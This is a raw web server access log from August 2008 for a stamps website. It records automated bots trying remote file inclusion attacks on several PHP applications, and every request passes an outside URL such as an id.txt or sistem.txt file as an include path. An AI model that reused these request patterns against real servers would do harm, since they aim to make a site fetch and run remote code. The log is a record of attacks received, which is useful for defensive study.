218.38.54.160 - - [03/Aug/2008:21:34:51 -0700] "GET /errors.php?error=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.98.116.103 - - [03/Aug/2008:21:36:08 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.elnavegantedigital.es/components/pay/injek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
82.165.253.72 - - [03/Aug/2008:21:37:21 -0700] "GET /logs/access_080630.log/modules/agendax/addevent.inc.php?agendax_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.165.253.72 - - [03/Aug/2008:21:37:21 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.165.253.72 - - [03/Aug/2008:21:37:21 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.26.63.17 - - [03/Aug/2008:21:38:28 -0700] "GET /logs/access_080609.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.26.63.17 - - [03/Aug/2008:21:38:28 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.26.63.17 - - [03/Aug/2008:21:38:28 -0700] "GET /logs/access_080421.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.26.63.17 - - [03/Aug/2008:21:38:28 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.25.54.205 - - [03/Aug/2008:21:40:16 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
211.202.2.55 - - [03/Aug/2008:21:41:28 -0700] "GET //?path%5Bdocroot%5D=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.mathstamps.com"
63.208.74.34 - - [03/Aug/2008:21:41:44 -0700] "GET /logs/access_080428.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
63.208.74.34 - - [03/Aug/2008:21:41:45 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
63.208.74.34 - - [03/Aug/2008:21:41:45 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.26.63.17 - - [03/Aug/2008:21:41:46 -0700] "GET /logs/access_080609.log%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.26.63.13 - - [03/Aug/2008:21:41:49 -0700] "GET /logs/access_080428.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.26.63.13 - - [03/Aug/2008:21:41:49 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
64.26.63.13 - - [03/Aug/2008:21:41:49 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
63.208.74.34 - - [03/Aug/2008:21:41:51 -0700] "GET /logs/access_080428.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
63.208.74.34 - - [03/Aug/2008:21:41:51 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
63.208.74.34 - - [03/Aug/2008:21:41:51 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.50.25.80 - - [03/Aug/2008:21:42:11 -0700] "GET /logs/access_080428.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
74.50.25.80 - - [03/Aug/2008:21:42:11 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
74.50.25.80 - - [03/Aug/2008:21:42:11 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mvpseminars.com/language/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
74.50.25.80 - - [03/Aug/2008:21:42:18 -0700] "GET /logs/access_080428.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mvpsemina